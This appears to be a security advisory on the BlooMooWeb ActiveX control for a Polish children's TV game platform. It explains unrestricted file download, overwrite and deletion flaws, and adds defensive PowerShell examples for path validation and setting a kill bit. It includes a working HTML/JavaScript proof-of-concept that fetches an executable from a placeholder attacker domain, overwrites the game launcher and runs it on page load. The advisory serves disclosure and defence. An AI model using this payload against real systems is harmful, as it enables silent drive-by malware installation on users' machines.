
ActiveX security leaks in the TV owned web game platform



There is a security problem in the architecture / design of the
BlooMooWeb ActiveX control.

BlooMooWeb is an internet game platform for kids, popular mainly
in Poland. It has been provided for the TV programme
"Krolestwo Maciusia" ("The Kingdom of Macius"),
broadcast on TVP1, the first channel of Polish public television.

The flaws allow any malicious person who can induce the
remote user to click a specified link to silently download
and immediately execute any attacker-supplied code
in the current user's context.



Technical description:


The BlooMooWeb ActiveX control, using the CLSID identifier
CLSID: 22E9EFBA-114C-4DA0-AE72-D8F2C7138002,
is used by the web platform to download and install the game
system files and later for downloading / installing particular games.

After the game system is installed (installation of the ActiveX control has
been approved / the BlooMooWeb platform has been downloaded and installed),
the game system binaries and data are stored in the following directory:
C:/Program Files/AidemMedia/BlooMooWeb
and the default launch path is set to that directory.

The following 3 methods, exposed to the scripting layer for the
data download / installation process, are particularly interesting:

BW_DownloadFile(BSTR bstrUrl, BSTR bstrLocalFile,BSTR bstrCallback)
BW_LaunchGame(BSTR bstrParams)
BW_DeleteTempFile(BSTR filePath)

First of all it has to be said that the control implementation doesn't
have any protection allowing it to distinguish between the game platform
data area and the user's system data area.
Therefore any path parameters passed to the control's methods can point anywhere
outside the local installation directory on the user's hard drive.

The BW_DownloadFile() method, using non-blocking streaming with a callback
system, downloads the remote file specified by the URL string bstrUrl parameter,
streaming it with overwrite IO permission into the file
pointed to by the bstrLocalFile parameter.
The third parameter names a callback function which can be used to
track the download progress visually (GUI) or silently.

A call to the BW_LaunchGame method with any
string argument results in execution of the
%BlooMooWebDirectory%/BlooMooWeb.exe
binary (the game platform core executable),
spawning a new process in the current user context.

Since the control has only a callback system and no GUI,
it is a simple matter to drive it silently with no user interaction or
signaling.

Moreover, having full scripting access to a method that downloads
any data (including binaries) with overwrite IO permission,
with no user interaction, to any directory on the
user's physical disk, it can be used to overwrite the default
game-launcher binary BlooMooWeb.exe with an attacker-chosen file.
After that, any single call to BW_LaunchGame() will spawn a new process from
the attacker-supplied binary file.

Simplifying: with just one user click on an attacker-provided link,
attacker-supplied executable code (containing a trojan horse,
virus, spyware, adware, etc.)
can be downloaded silently and instantly executed with the user's account
privileges.

A DoS type attack vector is introduced by the BW_DeleteTempFile() method,
which is not confined to the internal ActiveX installer system
but is available externally for scripting.
It is used by the game installer engine to delete files after game
deinstallation and for other cleanup purposes.
It takes a single string argument, which can point to ANY file on the user's
physical disk.
That introduces another "creepy" scenario where
a user induced by the malicious attacker to visit an attacker-controlled site
can, with a single click on a link, wipe any
data from their own disk, including erasing operating system core files, leading to
a crash of the user's OS.
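The containment check missing from the control, for both the BW_DownloadFile()
and BW_DeleteTempFile() path arguments, is sketched below as an added example
(not the vendor's code). It assumes a data subdirectory under the install
directory (the "data" folder name is an assumption) and, because the PoC
overwrites the launcher inside the install directory, it also refuses
executable file types, so containment alone would not be enough:

```powershell
# Added example, not from the advisory or the vendor: the check a control of
# this kind should apply to every script-supplied path before writing or deleting.
function Test-PlatformDataPath {
    param(
        [string]$DataDir,     # assumed layout: <install dir>\data
        [string]$Requested    # value as passed by page script to the control
    )
    $blockedExt = '.exe', '.dll', '.com', '.bat', '.cmd', '.scr', '.pif', '.lnk'
    try {
        # Combine keeps an absolute $Requested as-is, so an absolute path outside
        # $DataDir fails the prefix test below; GetFullPath collapses any '..'.
        $base = [System.IO.Path]::GetFullPath($DataDir).TrimEnd('\') + '\'
        $full = [System.IO.Path]::GetFullPath([System.IO.Path]::Combine($base, $Requested))
    } catch {
        return $false   # malformed path (illegal characters, too long, ...)
    }
    if (-not $full.StartsWith($base, [System.StringComparison]::OrdinalIgnoreCase)) {
        return $false   # resolves outside the platform data area
    }
    $ext = [System.IO.Path]::GetExtension($full)
    if ($blockedExt -contains $ext.ToLowerInvariant()) {
        return $false   # executable content is never written or deleted via script
    }
    return $true
}

# Constructed cases for a quick self-check (paths are illustrative)
$dataDir = 'C:\Program Files\AidemMedia\BlooMooWeb\data'
$cases = @(
    @{ Path = 'games\castle\level1.dat';           Expect = $true  },
    @{ Path = '..\BlooMooWeb.exe';                  Expect = $false },  # the launcher overwrite from the PoC
    @{ Path = 'C:\Windows\system32\anything.dat';  Expect = $false },  # absolute path outside the platform
    @{ Path = 'games\..\..\..\..\Users\x.dat';      Expect = $false }   # traversal out of the data area
)
foreach ($c in $cases) {
    $got = Test-PlatformDataPath -DataDir $dataDir -Requested $c.Path
    "{0,-42} allowed={1} (expected {2})" -f $c.Path, $got, $c.Expect
}
```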



Concluding:


The BlooMooWeb web game platform has been designed
by the gaming company and TV producer Aidem Media and started in January 2006
as a part of the Polish public television show for kids called "Krolestwo Maciusia".
Since then it has gained over 12000 forum-registered users, with web chat,
forums and ICQ/GG messaging protocol identity tracking.
Excluding the users that have had their operating systems reinstalled or have changed
the ActiveX security policy of their
browser since the game platform installation, it can be expected
that this web game system is widespread and has a rather big audience,
in and outside Poland.
Taking into consideration that a TV supported / owned game platform
makes itself trustworthy enough to get ActiveX control installation approved,
the origins of the flaw in this software could be interpreted in two ways:
as an accidental security vulnerability resulting from bad architecture
design,
or as a backdoor system into platform users' machines, "accidentally" built in
by the vendor.



Affected software:


Windows 98 SE
Windows 2000 SP4
Windows XP pro SP2
Windows 2003 Server Standard SP1
BlooMooWeb ActiveX CTL v1.0.9



Example PoC exploit showing remote execution of attacker supplied binary code:


<html>
<head>
<script language="JavaScript">

var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";

function spawn2()
{
        aa1=o2obj.GetInstallationDir(null);
        aa2="BlooMooWEB.exe";
        o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}

function callback001( msgCode, param1, param2, param3 )
{
        if(msgCode == 'DOWNLOAD_COMPLETE' )
        {
                o2obj.BW_LaunchGame("treleferekuku");
        }
}

</script>
</head>

<body onload="spawn2()"> 
<object ID="o2obj" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002">
</object>
</body>
</html>




Solution:


-removal of the BlooMooWeb ActiveX control binary, placed in:
 %WindowsDirectory%/downloaded program files/AidemATL.dll

-turning ActiveX off entirely in the browser settings (or switching the browser
to a non-Microsoft one and forgetting about MS suicidal inventions)

-thinking twice before approving installation of any ActiveX driven software,
whether unsigned or signed by a widespread "big corp"
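As an added example (not part of the advisory), the following PowerShell
script checks whether the control is registered on a machine and sets the
Internet Explorer kill bit for its CLSID, which stops the browser from
instantiating the control even before the DLL is removed. It uses the CLSID
given above and must be run from an elevated prompt:

```powershell
# Added example: detect the BlooMooWeb control and kill-bit it (CLSID from the advisory).
$clsid = '{22E9EFBA-114C-4DA0-AE72-D8F2C7138002}'

# 1. Detection: is the control registered, and which DLL backs it?
$server = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"
if (Test-Path $server) {
    $dll = (Get-ItemProperty -Path $server).'(default)'
    Write-Host "Control $clsid is registered, server: $dll"
    if ($dll -and (Test-Path $dll)) {
        Get-Item $dll | Select-Object FullName, Length, LastWriteTime
    }
} else {
    Write-Host "Control $clsid is not registered on this machine"
}

# 2. Mitigation: Compatibility Flags = 0x400 is the IE kill bit; the browser
#    refuses to create the object while the DLL may still sit on disk.
$compat = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
if (-not (Test-Path $compat)) { New-Item -Path $compat -Force | Out-Null }
New-ItemProperty -Path $compat -Name 'Compatibility Flags' -PropertyType DWord `
    -Value 0x400 -Force | Out-Null

# 3. Verify the bit is actually set
$flags = (Get-ItemProperty -Path $compat).'Compatibility Flags'
if (($flags -band 0x400) -eq 0x400) {
    Write-Host "Kill bit set for $clsid"
} else {
    Write-Warning "Kill bit NOT set for $clsid"
}
```

On 64-bit Windows the 32-bit browser reads the same key under
HKLM:\SOFTWARE\Wow6432Node\..., so apply the value there as well.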



Links:


"The Kingdom of Macius" TV show official web page:
http://www.krolestwomaciusia.pl

BlooMooWeb game portal:
http://www.krolestwomaciusia.pl/bweb_aktualnosci.php

Polish public television main web page:
http://www.tvp.pl



information provided by Max Gipehtykrop of German Reverse Force 
maxgipeh@xxxxxxxxx